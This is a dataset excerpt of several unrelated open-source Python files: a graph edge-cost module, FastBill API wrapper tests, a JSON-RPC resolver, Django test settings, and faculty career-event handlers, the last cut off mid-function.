repo_name (string, len 5-92) | path (string, len 4-232) | copies (string, 19 classes) | size (string, len 4-7) | content (string, len 721-1.04M) | license (string, 15 classes) | hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean (float64, 6.51-99.9) | line_max (int64, 15-997) | alpha_frac (float64, 0.25-0.97) | autogenerated (bool, 1 class) |
---|---|---|---|---|---|---|---|---|---|---|
alanaberdeen/coupled-minimum-cost-flow-track | cmcft/tools/params/c_cost.py | 1 | 2405 | # c_cost.py
# Cost vector for edges in coupled matrix
import numpy as np
__all__ = ["c_cost"]
def c_cost(g, a_coup, a_vertices):
# TODO: think this function is slow. Check for performance increases.
# c_cost
# creates vector of costs for edges
#
# Inputs: g - graph structure
# a_coup - coupled incidence matrix
# a_vertices - order of rows in coupled matrix
#
# Outputs: c - list of costs for each edge in incidence matrix
#
# Initialise cost vector
c = []
# For all edges in coupled matrix (iterating over transpose)
for e in a_coup.T:
# Get vertices connected by edge
vertex_indices = np.nonzero(e)
v = [a_vertices[i] for i in vertex_indices[1]]
# Get weights
cost = 0
# For simple edges
if len(v) == 2:
try:
cost = g[v[0]][v[1]]['weight']
except KeyError:
cost = g[v[1]][v[0]]['weight']
# For coupled edges
elif len(v) == 4:
# Find merge/split event label
ms_node = ms_event(v, g)
for n in v:
try:
cost = cost + g.edge[n][ms_node]['weight']
except KeyError:
cost = cost + g.edge[ms_node][n]['weight']
# Append to cost vector
c.append(cost)
return c
def ms_event(vertices, graph):
# ms_event
# given 4 nodes find the split or merge vertex that they are connected to
#
# Inputs: vertices - list of 4 node labels
# graph - graph structure
# Outputs: event_label - label of split/merge node
#
# initialise_out set
num = []
event = None
# split nodes
if 'D' in vertices:
event = 'M'
for n in vertices:
if 'L' in n:
num.append(''.join(i for i in n if i.isdigit()))
# merge nodes
elif 'A' in vertices:
event = 'S'
for n in vertices:
if 'R' in n:
num.append(''.join(i for i in n if i.isdigit()))
# Combine to give event label
event_label = (event + '(' + num[0] + ',' + num[1] + ')')
# Check if correct way around
if not graph.has_node(event_label):
event_label = (event + '(' + num[1] + ',' + num[0] + ')')
return event_label
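# --- Editor's usage sketch (not part of the original module; node labels are
# hypothetical and assume a networkx-style graph) ---
# import networkx as nx
# g = nx.Graph()
# g.add_node('M(1,2)')
# vertices = ['D', 'L1', 'L2', 'R9']   # exact label 'D' present -> merge event
# ms_event(vertices, g)                # -> 'M(1,2)'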
| mit | -3,617,845,052,523,256,300 | 23.540816 | 77 | 0.50894 | false |
stylight/python-fastbill | tests/test_api.py | 1 | 6430 | #!/usr/bin/env python
# encoding: utf-8
import datetime
import decimal
import httpretty
import json
import unittest
# Set the endpoint to http because some library combination
# leads to an SSLError when running the test with httpretty.
api_endpoint = "http://automatic.fastbill.com/api/1.0/api.php"
api_email = "[email protected]"
api_key = "4"
RESPONSE_DATA = {
'SUBSCRIPTIONS': [
{
'SUBSCRIPTION': {
'SUBSCRIPTION_ID': '1101',
'CUSTOMER_ID': '296526',
'START': '2013-05-24 13:50:33',
'NEXT_EVENT': '2013-06-24 13:50:33',
'CANCELLATION_DATE': '2013-06-24 13:50:33',
'STATUS': 'canceled',
'ARTICLE_NUMBER': '1',
'SUBSCRIPTION_EXT_UID': '',
'LAST_EVENT': '2013-05-24 13:50:33',
}
}
]
}
class JsonTest(unittest.TestCase):
def test_json_encoder(self):
import fastbill
json_dump = json.dumps({
'date': datetime.date(2016, 6, 2),
'datetime': datetime.datetime(2015, 5, 1, 14, 42, 17),
'money': decimal.Decimal("17.23"),
}, cls=fastbill.jsonencoder.CustomJsonEncoder)
self.assertEqual(
json.loads(json_dump),
{'date': '2016-06-02',
'money': '17.23',
'datetime': '2015-05-01 14:42:17'}
)
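    # Editor's aside (hedged): the encoder under test also works standalone,
    # e.g. json.dumps({'when': datetime.date(2016, 6, 2)},
    #                 cls=fastbill.jsonencoder.CustomJsonEncoder)
    # would yield '{"when": "2016-06-02"}'.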
class TestWrapper(unittest.TestCase):
TESTCASES = {
'customer.get': [
({'country_code': 'at'}, 200, {'CUSTOMERS': []}),
({'country_code': 'de'}, 200, {'CUSTOMERS': [{'NAME': 'Hans'}]}),
],
'getnewargs': [
({}, 400, {u'ERRORS': [u'unknown SERVICE: getnewargs',
u'unknown SERVICE: ']}),
],
'subscription.get': [
({}, 200, {}),
],
'subscription.setusagedata': [
(
{
'USAGE_DATE': datetime.datetime(2015, 5, 1),
'UNIT_PRICE': decimal.Decimal('17.23'),
'CURRENCY_CODE': u'EUR',
},
200,
{}
),
],
}
def test_response(self):
import fastbill
response = RESPONSE_DATA
class FakeAPI(object):
def subscription_get(self, filter=None):
return fastbill.response.FastbillResponse(response, self)
resp = fastbill.response.FastbillResponse(response, FakeAPI())
self.assertEqual(response,
resp.subscriptions[0].subscription.subscription)
self.assertRaises(AttributeError, getattr, resp, 'blah')
resp_iter = iter(resp)
self.assertEqual(next(resp_iter),
response['SUBSCRIPTIONS'][0])
self.assertRaises(StopIteration, next, resp_iter)
@httpretty.activate
def test_wrapper(self):
import fastbill
from mock import Mock
mock = Mock()
class ResponseLookAlike(object):
def __init__(self, status_code):
self.status_code = status_code
def __eq__(self, other):
return self.status_code == other.status_code
api = fastbill.FastbillWrapper(api_email, api_key,
service_url=api_endpoint,
pre_request=mock.pre_request,
post_request=mock.post_request)
for method_name, calls in self.TESTCASES.items():
attribute_name = method_name.replace(".", "_")
try:
method = getattr(api, attribute_name)
except AttributeError:
if not attribute_name.startswith("_"):
raise
for (filter_by, http_code, response) in calls:
def request_callback(method, _, headers,
method_name=method_name,
http_code=http_code,
response=response):
request = json.loads(method.body.decode('utf8'))
request['SERVICE'] = method_name
return (http_code, headers, json.dumps({
'RESPONSE': response,
'REQUEST': request,
}, cls=fastbill.jsonencoder.CustomJsonEncoder))
httpretty.register_uri(httpretty.POST,
api.SERVICE_URL,
body=request_callback)
params = {'filter': filter_by}
if http_code == 200:
result = method(**params)
self.assertEqual(result, response)
else:
self.assertRaises(fastbill.exceptions.FastbillResponseError,
method, **params)
# The actual payload will look like this.
payload = params.copy()
payload.update({
'service': method_name,
'limit': None,
'offset': None,
'data': None
})
mock.pre_request.assert_called_with(
method_name,
payload
)
mock.post_request.assert_called_with(
method_name,
payload,
ResponseLookAlike(http_code)
)
def test_pickle(self):
import pickle
import fastbill
api = fastbill.FastbillWrapper(api_email, api_key,
service_url=api_endpoint,
name="blah")
response = fastbill.response.FastbillResponse(RESPONSE_DATA, api)
pickled_response = pickle.dumps(response)
unpickled_response = pickle.loads(pickled_response)
self.assertTrue(unpickled_response.api is None)
self.assertEqual(
unpickled_response.subscriptions[0].subscription.article_number,
'1')
self.assertRaises(
KeyError,
lambda: unpickled_response.subscriptions[0].subscription.customer)
if __name__ == '__main__':
import nose
nose.runmodule(argv=['-vv', '--with-doctest'])
| mit | 5,063,697,128,748,161,000 | 32.489583 | 80 | 0.487092 | false |
steffgrez/fast-jsonrpc2 | fast_jsonrpc2/resolver.py | 1 | 2183 | """
from fast_jsonrpc2 import JSONRPCResolver
def foo(msg):
    return 'foobar ' + str(msg)
router = {'foo': foo}
resolver = JSONRPCResolver(router)
json_request = '{"jsonrpc": "2.0", "method": "foo", "params": ["toto"], "id": 1}'
json_response = resolver.handle(json_request)
print json_response
-> {"jsonrpc": "2.0", "result": "foobar toto", "id": 1}
"""
import json
from fast_jsonrpc2.request import RequestHandler
from fast_jsonrpc2.response import ResponseHandler
class JSONRPCResolver(object):
__slots__ = [
'serializer',
'response_handler',
'request_handler'
]
def __init__(
self,
router,
lazy_check=False,
error_verbose=True,
serializer=json
):
self.serializer = serializer
self.response_handler = ResponseHandler(error_verbose)
self.request_handler = RequestHandler(
self.response_handler, router, lazy_check
)
def handle(self, str_request):
response = None
try:
# handle encoding
if isinstance(str_request, bytes):
str_request = str_request.decode("utf-8")
# get response from unserialized request
try:
request = self.serializer.loads(str_request)
except (TypeError, ValueError):
response = self.response_handler.get_parse_error_response(
data='Bad formatted json'
)
else:
if not request:
response = self.response_handler \
.get_invalid_request_response(
data='Empty request is not allowed'
)
else:
response = self.request_handler.get_response(request)
except Exception as e:
# handle unexpected exception
response = self.response_handler.get_internal_error_response(
data=e.args[0]
)
# return serialized result
return self.serializer.dumps(response) if response else ''
class JSONRPCException(Exception):
pass
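# --- Editor's sketch of the error path (hedged; inferred from the code above,
# not part of the original module) ---
# resolver = JSONRPCResolver({'foo': lambda msg: 'foobar ' + str(msg)})
# resolver.handle('not json')
# -> serializer.loads() raises ValueError, so handle() returns the serialized
#    parse-error response built by ResponseHandler.get_parse_error_response()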
| mit | 4,663,643,689,105,370,000 | 26.2875 | 79 | 0.558406 | false |
ninemoreminutes/django-datatables | test_project/settings.py | 1 | 2955 | # Python
import os
import sys
# Django
from django.conf import global_settings
# Update this module's local settings from the global settings module.
this_module = sys.modules[__name__]
for setting in dir(global_settings):
if setting == setting.upper():
setattr(this_module, setting, getattr(global_settings, setting))
# Absolute path to the directory containing this Django project.
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(PROJECT_ROOT, 'test_project.sqlite3'),
}
}
SITE_ID = 1
STATIC_URL = '/static/'
MIDDLEWARE_CLASSES += (
'debug_toolbar.middleware.DebugToolbarMiddleware',
'devserver.middleware.DevServerMiddleware',
)
TEMPLATE_DIRS = (
#os.path.join(PROJECT_ROOT, 'templates'),
)
ROOT_URLCONF = 'test_project.urls'
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
#'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'debug_toolbar',
'devserver',
'django_extensions',
'south',
'sortedm2m',
'fortunecookie',
'datatables',
'test_app',
)
INTERNAL_IPS = ('127.0.0.1',)
DEBUG_TOOLBAR_CONFIG = {
#'INTERCEPT_REDIRECTS': False,
}
DEVSERVER_DEFAULT_ADDR = '127.0.0.1'
DEVSERVER_DEFAULT_PORT = '8044'
DEVSERVER_MODULES = (
# SQLRealTimeModule is broken with Django 1.6.
#'devserver.modules.sql.SQLRealTimeModule',
'devserver.modules.sql.SQLSummaryModule',
'devserver.modules.profile.ProfileSummaryModule',
# Modules not enabled by default
#'devserver.modules.ajax.AjaxDumpModule',
#'devserver.modules.profile.MemoryUseModule',
#'devserver.modules.cache.CacheSummaryModule',
#'devserver.modules.profile.LineProfilerModule',
)
SECRET_KEY = 'gkwl+r%+^4==^(dnnkv8o#&h&bn=x43*k$h7_e7p+l0w&eba)m'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse',
}
},
'handlers': {
'console': {
'level': 'INFO',
'class': 'logging.StreamHandler',
},
'null': {
'class': 'django.utils.log.NullHandler',
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django': {
'handlers': ['console'],
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
'py.warnings': {
'handlers': ['console'],
},
'datatables': {
'handlers': ['console'],
}
}
}
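# Editor's note (assumption about typical usage; not part of the original
# settings file): code in this project would pick up one of the loggers
# configured above with, e.g.:
#   import logging
#   logger = logging.getLogger('datatables')
#   logger.info('routed to the console handler defined in LOGGING')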
| bsd-3-clause | 7,971,362,363,779,574,000 | 23.221311 | 72 | 0.598308 | false |
sfu-fas/coursys | faculty/event_types/career.py | 1 | 27177 | import fractions
import itertools
from django import forms
from django.utils.safestring import mark_safe
from django.http import HttpResponse
from faculty.event_types import fields, search
from faculty.event_types.base import BaseEntryForm
from faculty.event_types.base import CareerEventHandlerBase
from faculty.event_types.choices import Choices
from faculty.event_types.base import SalaryAdjust, TeachingAdjust
from faculty.event_types.mixins import TeachingCareerEvent, SalaryCareerEvent
from faculty.event_types.constants import SALARY_STEPS_CHOICES
from dashboard.letters import yellow_form_limited, yellow_form_tenure
RANK_CHOICES = Choices(
('LLEC', 'Limited-Term Lecturer'),
('LABI', 'Laboratory Instructor'),
('LECT', 'Lecturer'),
('SLEC', 'Senior Lecturer'),
('INST', 'Instructor'),
('ASSI', 'Assistant Professor'),
('ASSO', 'Associate Professor'),
('FULL', 'Full Professor'),
('URAS', 'University Research Associate'),
('ADJC', 'Adjunct Professor'),
('POPP', 'Professor of Professional Practice'),
#('UNIV', 'University Professor'),
#('UNIR', 'University Research Professor'),
)
CONTRACT_REVIEW_CHOICES = Choices(
('PEND', 'Pending'),
('PROM', 'Renewed'),
('DENY', 'Denied'),
)
class AppointmentEventHandler(CareerEventHandlerBase):
"""
The big career event: from hiring to leaving the position.
"""
EVENT_TYPE = 'APPOINT'
NAME = 'Appointment to Position'
IS_EXCLUSIVE = True
TO_HTML_TEMPLATE = """
{% extends "faculty/event_base.html" %}{% load event_display %}{% block dl %}
<dt>Position Number</dt><dd>{{ handler|get_display:"position_number" }}</dd>
<dt>Leaving Reason</dt><dd>{{ handler|get_display:"leaving_reason" }}</dd>
<dt>Spousal Hire</dt><dd>{{ handler|get_display:"spousal_hire"|yesno }}</dd>
{% if handler|get_config:"degree1" != 'unknown' and handler|get_config:"degree1" != ''%}
<dt>Degrees Held</dt>
<dd>{{ handler|get_display:"degree1" }}, {{ handler|get_display:"year1" }},
{{ handler|get_display:"institution1" }}, {{ handler|get_display:"location1" }}
{% if handler|get_config:"degree2" != 'unknown' and handler|get_config:"degree2" != ''%}<br>
<dd>{{ handler|get_display:"degree2" }}, {{ handler|get_display:"year2" }},
{{ handler|get_display:"institution2" }}, {{ handler|get_display:"location2" }}{% endif %}
{% if handler|get_config:"degree3" != 'unknown' and handler|get_config:"degree3" != '' %}<br>
<dd>{{ handler|get_display:"degree3" }}, {{ handler|get_display:"year3" }},
{{ handler|get_display:"institution3" }}, {{ handler|get_display:"location3" }}{% endif %}
{% endif %}
{% if handler|get_config:"teaching_semester_credits" != 'unknown' and handler|get_config:"teaching_semester_credits" != ''%}
<dt>Teaching Semester Credits</dt><dd>{{ handler|get_config:"teaching_semester_credits" }}</dd>
{% endif %}
{% endblock %}
"""
PDFS = {'yellow1': 'Yellow Form for Tenure Track',
'yellow2': 'Yellow Form for Limited Term'}
class EntryForm(BaseEntryForm):
LEAVING_CHOICES = Choices(
('HERE', '\u2014'), # hasn't left yet
('RETI', 'Retired'),
('END', 'Limited-term contract ended'),
('UNIV', 'Left: job at another University'),
('PRIV', 'Left: private-sector job'),
('GONE', 'Left: employment status unknown'),
('FIRE', 'Dismissal'),
('DIED', 'Deceased'),
('OTHR', 'Other/Unknown'),
)
position_number = forms.CharField(initial='', required=False, widget=forms.TextInput(attrs={'size': '6'}))
spousal_hire = forms.BooleanField(initial=False, required=False)
leaving_reason = forms.ChoiceField(initial='HERE', choices=LEAVING_CHOICES)
degree1 = forms.CharField(max_length=12, help_text='These are the degrees to be inserted into the '
'Recommendation for Appointment Forms (AKA "Yellow Form"). '
' List the highest degree first.', required=False,
label='Degree 1', widget=forms.TextInput(attrs={'size': '13'}))
year1 = forms.CharField(max_length=5, required=False, label='Year 1', widget=forms.TextInput(attrs={'size': '5'}))
institution1 = forms.CharField(max_length=25, required=False, label='Institution 1')
location1 = forms.CharField(max_length=23, required=False, label='City/Country 1')
degree2 = forms.CharField(max_length=12, required=False, label='Degree 2',
widget=forms.TextInput(attrs={'size': '13'}))
year2 = forms.CharField(max_length=5, required=False, label='Year 2', widget=forms.TextInput(attrs={'size': '5'}))
institution2 = forms.CharField(max_length=25, required=False, label='Institution 2')
location2 = forms.CharField(max_length=23, required=False, label='City/Country 2')
degree3 = forms.CharField(max_length=12, required=False, label='Degree 3',
widget=forms.TextInput(attrs={'size': '13'}))
year3 = forms.CharField(max_length=5, required=False, label='Year 3', widget=forms.TextInput(attrs={'size': '5'}))
institution3 = forms.CharField(max_length=25, required=False, label='Institution 3')
location3 = forms.CharField(max_length=23, required=False, label='City/Country 3')
teaching_semester_credits = forms.DecimalField(max_digits=3, decimal_places=0, required=False,
help_text='Number of teaching semester credits, for the tenure '
'track form')
SEARCH_RULES = {
'position_number': search.StringSearchRule,
'spousal_hire': search.BooleanSearchRule,
'leaving_reason': search.ChoiceSearchRule,
}
SEARCH_RESULT_FIELDS = [
'position_number',
'spousal_hire',
'leaving_reason',
]
def get_leaving_reason_display(self):
return self.EntryForm.LEAVING_CHOICES.get(self.get_config('leaving_reason'), 'N/A')
def short_summary(self):
return "Appointment to position"
def generate_pdf(self, key):
response = HttpResponse(content_type="application/pdf")
response['Content-Disposition'] = 'inline; filename="yellowform.pdf"'
if key == 'yellow1':
yellow_form_tenure(self, response)
return response
if key == 'yellow2':
yellow_form_limited(self, response)
return response
class SalaryBaseEventHandler(CareerEventHandlerBase, SalaryCareerEvent):
"""
An annual salary update
"""
EVENT_TYPE = 'SALARY'
NAME = "Base Salary Update"
IS_EXCLUSIVE = True
TO_HTML_TEMPLATE = """
{% extends "faculty/event_base.html" %}{% load event_display %}{% load humanize %}{% block dl %}
<dt>Rank & Step</dt><dd>{{ handler|get_display:"rank" }}, step {{ handler|get_display:"step" }}</dd>
<dt>Base salary</dt><dd>${{ handler|get_display:"base_salary"|floatformat:2|intcomma}}</dd>
<dt>Market Differential</dt><dd>${{ handler|get_display:"add_salary"|floatformat:2|intcomma }}</dd>
<dt>Add pay</dt><dd>${{ handler|get_display:"add_pay"|floatformat:2|intcomma }}</dd>
<dt>Total</dt><dd>${{ total|floatformat:2|intcomma }}</dd>
<!--<dt>Biweekly</dt><dd>${{ biweekly|floatformat:2 }}</dd>-->
{% endblock %}
"""
class EntryForm(BaseEntryForm):
rank = forms.ChoiceField(choices=RANK_CHOICES, required=True)
step = forms.DecimalField(max_digits=4, decimal_places=2,
help_text="Current salary step")
base_salary = fields.AddSalaryField(help_text="Base annual salary for this rank + step.")
add_salary = fields.AddSalaryField(label="Market Differential")
add_pay = fields.AddPayField()
def post_init(self):
# find the last-known rank as a default
if self.person:
from faculty.models import CareerEvent
event = CareerEvent.objects.filter(person=self.person, event_type='SALARY').effective_now().last()
if event:
self.fields['rank'].initial = event.config['rank']
SEARCH_RULES = {
'rank': search.ChoiceSearchRule,
'base_salary': search.ComparableSearchRule,
'step': search.ComparableSearchRule,
}
SEARCH_RESULT_FIELDS = [
'rank',
'base_salary',
'step',
]
def to_html_context(self):
total = self.get_config('base_salary')
total += self.get_config('add_salary')
total += self.get_config('add_pay')
return {
'total': total,
'biweekly': total/365*14,
}
def get_rank_display(self):
return RANK_CHOICES.get(self.get_config('rank'), 'Unknown Rank')
@classmethod
def default_title(cls):
return 'Base Salary'
def short_summary(self):
return "{2} step {1} at ${0}".format(self.get_config('base_salary'),
self.get_config('step'), self.get_rank_display())
def salary_adjust_annually(self):
salary = self.get_config('base_salary')
add_salary = self.get_config('add_salary')
add_pay = self.get_config('add_pay')
return SalaryAdjust(salary + add_salary, 1, add_pay)
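    # Editor's illustration (hedged): with config values base_salary=100000,
    # add_salary=5000 and add_pay=1200, salary_adjust_annually() above returns
    # SalaryAdjust(105000, 1, 1200) - base plus market differential, an
    # unchanged salary fraction, and the add-pay amount.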
class SalaryModificationEventHandler(CareerEventHandlerBase, SalaryCareerEvent):
"""
Salary modification/stipend event
"""
EVENT_TYPE = 'STIPEND'
NAME = "Salary Modification/Stipend"
TO_HTML_TEMPLATE = """
{% extends "faculty/event_base.html" %}{% load event_display %}{% block dl %}
<dt>Source</dt><dd>{{ handler|get_display:"source" }}</dd>
<dt>Amount</dt><dd>${{ handler|get_display:"amount" }}</dd>
{% endblock %}
"""
class EntryForm(BaseEntryForm):
STIPEND_SOURCES = Choices(
('RETENTION', 'Retention Award'),
('MARKETDIFF', 'Market Differential'),
('RESEARCH', 'Research Chair Stipend'),
('OTHER', 'Other'),
)
source = forms.ChoiceField(label='Stipend Source', choices=STIPEND_SOURCES)
# Do we want this to be adjusted during leaves?
amount = fields.AddSalaryField()
SEARCH_RULES = {
'source': search.ChoiceSearchRule,
'amount': search.ComparableSearchRule,
}
SEARCH_RESULT_FIELDS = [
'source',
'amount',
]
def get_source_display(self):
return self.EntryForm.STIPEND_SOURCES.get(self.get_config('source'), 'N/A')
@classmethod
def default_title(cls):
return 'Salary Modification / Stipend'
def short_summary(self):
return "{0}: ${1}".format(self.get_source_display(),
self.get_config('amount'))
def salary_adjust_annually(self):
amount = self.get_config('amount')
return SalaryAdjust(amount, 1, 0)
class TenureApplicationEventHandler(CareerEventHandlerBase):
"""
Tenure Application Career event
"""
EVENT_TYPE = 'TENUREAPP'
NAME = "Tenure Application"
IS_INSTANT = False
TO_HTML_TEMPLATE = '''{% extends "faculty/event_base.html" %}{% load event_display %}{% block dl %}
<dt>Result</dt><dd>{{ handler|get_display:"result" }}</dd>
{% endblock %}'''
class EntryForm(BaseEntryForm):
RESULT_CHOICES = Choices(
('PEND', 'Pending'),
('RECI', 'Tenured'),
('DENI', 'Denied'),
)
result = forms.ChoiceField(label='Result', choices=RESULT_CHOICES,
help_text='The end date of this event is assumed to be when this decision is effective.')
SEARCH_RULES = {
'result': search.ChoiceSearchRule,
}
SEARCH_RESULT_FIELDS = [
'result',
]
def get_result_display(self):
return self.EntryForm.RESULT_CHOICES.get(self.get_config('result'), 'unknown outcome')
def short_summary(self):
return "Tenure application: {0}".format(self.get_result_display(),)
class PromotionApplicationEventHandler(CareerEventHandlerBase):
"""
Promotion Application Career event
"""
EVENT_TYPE = 'PROMOTION'
NAME = "Promotion Application"
IS_INSTANT = False
TO_HTML_TEMPLATE = '''{% extends "faculty/event_base.html" %}{% load event_display %}{% block dl %}
<dt>Rank applied for</dt><dd>{{ handler|get_display:"rank" }}</dd>
<dt>Result</dt><dd>{{ handler|get_display:"result" }}</dd>
<dt>Steps Year One</dt><dd>{{ handler|get_display:"steps" }} <span class="helptext">(step increase in the first year after promotion)</span></dd>
<dt>Steps Year Two</dt><dd>{{ handler|get_display:"steps2" }} <span class="helptext">(step increase in the second year after promotion)</span></dd>
{% endblock %}'''
class EntryForm(BaseEntryForm):
RESULT_CHOICES = Choices(
('PEND', 'Pending'),
('RECI', 'Promoted'),
('DENI', 'Denied'),
)
rank = forms.ChoiceField(choices=RANK_CHOICES, required=True,
help_text='Rank being applied for (promoted to if successful)')
result = forms.ChoiceField(label='Result', choices=RESULT_CHOICES,
help_text='The end date of this event is assumed to be when this decision is effective.')
steps = forms.ChoiceField(label='Steps Year One', choices=SALARY_STEPS_CHOICES,
help_text=mark_safe('Annual step increase given for the <strong>first</strong> year after promotion'))
steps2 = forms.ChoiceField(label='Steps Year Two', choices=SALARY_STEPS_CHOICES,
help_text=mark_safe('Annual step increase given for the <strong>second</strong> year after promotion'))
SEARCH_RULES = {
'result': search.ChoiceSearchRule,
'steps': search.ComparableSearchRule,
'steps2': search.ComparableSearchRule,
}
SEARCH_RESULT_FIELDS = [
'result',
'steps',
'steps2',
]
SEARCH_FIELD_NAMES = {
'steps': 'Steps Year One',
'steps2': 'Steps Year Two',
}
def get_rank_display(self):
return RANK_CHOICES.get(self.get_config('rank'), 'unknown rank')
def get_result_display(self):
return self.EntryForm.RESULT_CHOICES.get(self.get_config('result'), 'unknown outcome')
def get_steps_display(self):
return SALARY_STEPS_CHOICES.get(self.get_config('steps'), 'unknown outcome')
def get_steps2_display(self):
return SALARY_STEPS_CHOICES.get(self.get_config('steps2'), 'unknown outcome')
def short_summary(self):
return "Promotion application: {0}".format(self.get_result_display(),)
class SalaryReviewEventHandler(CareerEventHandlerBase):
EVENT_TYPE = 'SALARYREV'
NAME = "Salary Review"
IS_INSTANT = False
TO_HTML_TEMPLATE = '''{% extends "faculty/event_base.html" %}{% load event_display %}{% block dl %}
<dt>Steps Granted</dt><dd>{{ handler|get_display:"steps" }}</dd>
{% endblock %}'''
class EntryForm(BaseEntryForm):
steps = forms.ChoiceField(label='Steps', choices=SALARY_STEPS_CHOICES,
help_text='Annual step increase given')
SEARCH_RULES = {
'steps': search.ComparableSearchRule,
}
SEARCH_RESULT_FIELDS = [
'steps',
]
def get_steps_display(self):
return SALARY_STEPS_CHOICES.get(self.get_config('steps'), 'unknown outcome')
def short_summary(self):
return "Salary Review: {0}".format(self.get_steps_display(),)
class OnLeaveEventHandler(CareerEventHandlerBase, SalaryCareerEvent, TeachingCareerEvent):
"""
Taking a sort of leave
"""
EVENT_TYPE = 'LEAVE'
NAME = "On Leave"
TO_HTML_TEMPLATE = """
{% extends "faculty/event_base.html" %}{% load event_display %}{% block dl %}
<dt>Leave Type</dt><dd>{{ handler|get_display:"reason" }}</dd>
<dt>Leave Fraction</dt><dd>{{ handler|get_display:"leave_fraction" }}</dd>
<dt>Teaching Credits</dt><dd>{{ handler|get_display:"teaching_credits" }}</dd>
<dt>Teaching Load Decrease</dt><dd>{{ handler|get_display:"teaching_load_decrease" }}</dd>
{% endblock %}
"""
class EntryForm(BaseEntryForm):
REASONS = Choices(
('MEDICAL', 'Medical'),
('PARENTAL', 'Parental'),
('ADMIN', 'Admin'),
('LOA', 'Leave of Absence'),
('SECONDMENT', 'Secondment'),
)
reason = forms.ChoiceField(label='Type', choices=REASONS)
leave_fraction = fields.FractionField(help_text="Fraction of salary received during leave e.g. '3/4' indicates "
"75% pay. It can also be input as a decimal value, e.g. 0.75 "
"for 75%.",
label='Work fraction', initial=1)
teaching_credits = fields.TeachingCreditField()
teaching_load_decrease = fields.TeachingReductionField()
SEARCH_RULES = {
'reason': search.ChoiceSearchRule,
}
SEARCH_RESULT_FIELDS = [
'reason',
]
def get_reason_display(self):
return self.EntryForm.REASONS.get(self.get_config('reason'), 'N/A')
@classmethod
def default_title(cls):
return 'On Leave'
def short_summary(self):
try:
frac = fractions.Fraction(self.get_config('leave_fraction'))
except TypeError:
frac = 0
return '%s Leave @ %.0f%%' % (self.get_reason_display(), frac*100)
def salary_adjust_annually(self):
leave_fraction = self.get_config('leave_fraction')
return SalaryAdjust(0, leave_fraction, 0)
def teaching_adjust_per_semester(self):
credits = self.get_config('teaching_credits', 0)
load_decrease = self.get_config('teaching_load_decrease')
return TeachingAdjust(credits, load_decrease)
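    # Editor's illustration (hedged): a leave_fraction entered as '3/4' parses
    # to fractions.Fraction(3, 4), so short_summary() above renders e.g.
    # 'Medical Leave @ 75%', and salary_adjust_annually() scales salary by 3/4.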
class StudyLeaveEventHandler(CareerEventHandlerBase, SalaryCareerEvent, TeachingCareerEvent):
"""
Study leave event
"""
EVENT_TYPE = 'STUDYLEAVE'
NAME = "Study Leave"
TO_HTML_TEMPLATE = """
{% extends "faculty/event_base.html" %}{% load event_display %}{% block dl %}
<dt>Option</dt><dd>{{ handler|get_display:"option" }} </dd>
<dt>Pay Fraction</dt><dd>{{ handler|get_display:"pay_fraction" }}</dd>
<dt>Report Received</dt><dd>{{ handler|get_display:"report_received"|yesno }}</dd>
<dt>Report Received On</dt><dd>{{ handler|get_display:"report_received_date" }}</dd>
<dt>Teaching Load Decrease</dt><dd>{{ handler|get_display:"teaching_decrease" }}</dd>
<dt>Deferred Salary</dt><dd>{{ handler|get_display:"deferred_salary"|yesno }}</dd>
<dt>Accumulated Credits</dt><dd>{{ handler|get_display:"accumulated_credits" }}</dd>
<dt>Study Leave Credits Spent</dt><dd>{{ handler|get_display:"study_leave_credits" }}</dd>
<dt>Study Leave Credits Carried Forward</dt><dd>{{ handler|get_display:"credits_forward" }}</dd>
{% endblock %}
"""
class EntryForm(BaseEntryForm):
PAY_FRACTION_CHOICES = [
('4/5', '80%'),
('9/10', '90%'),
('1', '100%'),
]
option = forms.CharField(min_length=1, max_length=1, required=False,
help_text='The option for this study leave. A, B, C, etc',
widget=forms.TextInput(attrs={'size': '1'}))
pay_fraction = fields.FractionField(choices=PAY_FRACTION_CHOICES)
report_received = forms.BooleanField(label='Report Received?', initial=False, required=False)
report_received_date = fields.SemesterField(required=False, semester_start=False)
teaching_decrease = fields.TeachingReductionField()
deferred_salary = forms.BooleanField(label='Deferred Salary?', initial=False, required=False)
accumulated_credits = forms.IntegerField(label='Accumulated Credits', min_value=0, max_value=99,
help_text='Accumulated unused credits', required=False)
study_leave_credits = forms.IntegerField(label='Study Leave Credits Spent', min_value=0, max_value=99,
help_text='Total number of Study Leave Credits spent for entire leave')
credits_forward = forms.IntegerField(label='Study Leave Credits Carried Forward', required=False, min_value=0,
max_value=10000,
help_text='Study Credits Carried Forward After Leave (may be left blank if unknown)')
def post_init(self):
# finding the teaching load and set the decrease to that value
        if self.person:
from faculty.util import ReportingSemester
from faculty.processing import FacultySummary
semester = ReportingSemester(self.initial['start_date'])
teaching_load = abs(FacultySummary(self.person).teaching_credits(semester)[1])
else:
teaching_load = 0
self.fields['teaching_decrease'].initial = teaching_load
SEARCH_RULES = {
'pay_fraction': search.ComparableSearchRule,
'report_received': search.BooleanSearchRule,
'teaching_decrease': search.ComparableSearchRule,
'study_leave_credits': search.ComparableSearchRule,
'credits_forward': search.ComparableSearchRule,
}
SEARCH_RESULT_FIELDS = [
'pay_fraction',
'report_received',
'report_received_date',
'teaching_decrease',
'study_leave_credits',
'credits_forward'
]
from django.conf.urls import url
EXTRA_LINKS = {'Teaching Summary': 'faculty:teaching_summary'}
@classmethod
def default_title(cls):
return 'Study Leave'
def get_pay_fraction_display(self):
try:
frac = fractions.Fraction(self.get_config('pay_fraction'))
except TypeError:
frac = 0
return '%.0f%%' % (frac*100)
def short_summary(self):
return 'Study Leave @ ' + self.get_pay_fraction_display()
def salary_adjust_annually(self):
pay_fraction = self.get_config('pay_fraction')
return SalaryAdjust(0, pay_fraction, 0)
def teaching_adjust_per_semester(self):
credits = self.get_config('teaching_decrease', 0)
